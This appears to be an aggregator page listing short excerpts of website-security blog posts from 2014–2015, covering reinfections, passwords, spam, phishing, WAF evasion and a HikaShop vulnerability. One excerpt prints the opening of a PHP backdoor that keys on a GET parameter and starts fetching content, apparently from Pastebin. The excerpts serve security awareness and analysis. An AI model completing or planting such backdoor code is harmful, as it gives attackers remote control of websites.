HackDig : Dig high-quality web security articles for hackers

Security for Life: Promoting the Development of a Security Professional

This week marks the fifth and final week of National Cyber Security Awareness Month (NCSAM) 2015. A program sponsored by the Department of Homeland Security (DHS) in cooperation with the National Cyber Security Alliance and the Multi-State Information Sharing and Analysis Center, NCSAM emphasizes our shared responsibility in strengthening the cyber security
Publish At:2015-10-30 08:40 | Read:3462 | Comments:0 | Tags:Featured Articles Security Awareness development Learn Mento

Why Website Reinfections Happen

I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and, more importantly, how to clean them. It’s this idea that regardless of who you are, you must always know the foundation that makes this company work. After a
Publish At:2015-03-24 12:50 | Read:4506 | Comments:0 | Tags:Learn Website Security bad habits best practices reinfection

The Impacts of a Hacked Website

Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failing each other, we are not setting ou
Publish At:2015-03-19 20:50 | Read:4329 | Comments:0 | Tags:Learn Website Hacked Website Security

The Impacts of a Hacked Website

Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failing each other, we are not setting our
Publish At:2015-03-19 14:35 | Read:3687 | Comments:0 | Tags:Learn Website Hacked Website Security

Why Websites Get Hacked

I spend a good amount of time engaging with website owners across a broad spectrum of businesses. Interestingly enough, unless I’m talking large enterprise, there is a common question that often comes up: Why would anyone ever hack my website? Depending on who you are, the answer to this can vary. Nonetheless, it often revolves around a few very finite exp
Publish At:2015-02-26 14:40 | Read:6484 | Comments:0 | Tags:Ask Sucuri Learn Website Security

The Dynamics of Passwords

How often do you think about the passwords you’re using? Not only for your website, but also for everything else you do on the internet on a daily basis? Are you re-using any of the same passwords to make it easier to remember them? We see it all too often: weak passwords used for FTP, database configuration, cPanel, and CMS logins. Everyone has their own
Publish At:2015-02-14 03:05 | Read:4763 | Comments:0 | Tags:Learn Website Security brute force firewall passwords

Creative Evasion Technique Against Website Firewalls

During one of our recent in-house Capture The Flag (CTF) events, I was playing with the idea of what could be done with Non-Breaking Spaces. I really wanted to win and surely there had to be a way through the existing evasion controls. This post is going to be a bit code-heavy for most end-users, but if you choose to read you’re bound to find it very
Publish At:2015-02-03 11:00 | Read:5320 | Comments:0 | Tags:Learn vulnerability Website Security encoding url

Website Backdoors Leverage the Pastebin Service

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files. Here’s the backdoor code: if(array_keys($_GET)[0] == 'up'){ $content = file_get_contents("
Publish At:2015-01-06 22:25 | Read:7184 | Comments:0 | Tags:Learn Website Attacks Website Hacked Website Security backdo

Malvertising on a Website Without Ads

When you first configure your website, whether it be WordPress, Joomla, Drupal, or any other flavor of the month, it is often in its purest state. Unless of course the server was previously compromised, which in and of itself is another conversation outright. Barring that one instance, the new website should not exhibit any malicious behavior. Or so you would
Publish At:2014-12-12 12:25 | Read:5323 | Comments:0 | Tags:Learn Website Attacks Website Security brute force counter J

IIS, Compromised GoDaddy Servers, and Cyber Monday Spam

While doing an analysis of one black-hat SEO doorway on a hacked site, I noticed that it linked to many similar doorways on other websites, and all those websites were on IIS servers. When I see these patterns, I try to dig deeper and figure out what else those websites have in common. This time I revealed quite a few GoDaddy Windows servers have been pwned
Publish At:2014-12-08 07:40 | Read:4644 | Comments:1 | Tags:Learn Webserver Infections Website Spam Cyber Monday godaddy

Leveraging the WordPress Platform for SPAM

We’ve all seen WordPress comment and pingback spam, but thanks to strict moderation regimes and brilliant WordPress plugins that focus strictly on SPAM comments, comment spam isn’t a major problem for most websites these days. I have seen, however, a new trend starting to emerge when it comes to spam involving WordPress. In recent years WordPress has become
Publish At:2014-12-05 18:25 | Read:4006 | Comments:0 | Tags:Learn Website Spam WordPress Security hijacking

Typos Can have a Bigger Impact Than Expected

Have you ever thought about the cost of a typo? You know what I mean, a simple misspelling of a word somewhere on your website. Do you think there’s a risk in that? You may have seen the Grammar Police all over your comments yelling that you used the wrong version of “your” and pointing out how stupid you are, right? Unfortunately, that’s the int
Publish At:2014-11-26 11:55 | Read:3187 | Comments:0 | Tags:Learn Website Security JavaScript typo

Protecting Against Unknown Software Vulnerabilities

Bugs exist in every piece of code. It is suggested that for every 1,000 lines of code, there are on average 1 to 5 bugs to be found. Some of these bugs can have security implications; these are known as vulnerabilities. These vulnerabilities can be used to exploit and compromise your server, your site and your users. As long as there are people involved i
Publish At:2014-11-24 12:10 | Read:5271 | Comments:0 | Tags:Learn Website Firewall Website Security wordpress

Website Malware Removal: Phishing

As we continue on our Malware Removal series we turn our attention to the increasing threat of Phishing infections. Just like a fisherman casts and reels with his fishing rod, a “phisher-man” will try their luck baiting users with fake pages, often in the form of login pages. These copied website pages are cast into infected websites with the ho
Publish At:2014-11-21 16:35 | Read:3908 | Comments:0 | Tags:Learn Website Malware Website Security phishing prevention v

Deep Dive into the HikaShop Vulnerability

It’s been two months since our disclosure of an Object Injection vulnerability affecting versions <2.3.3 of the Joomla! Hikashop extension. The vulnerability allowed an attacker to execute malicious code on a target website. How Does Object Injection Work? Object Injection occurs when raw user input is passed to an unserialize() function call. When this h
Publish At:2014-11-17 11:50 | Read:6637 | Comments:1 | Tags:Learn Vulnerability Disclosure hikashop Joomla! Security vul
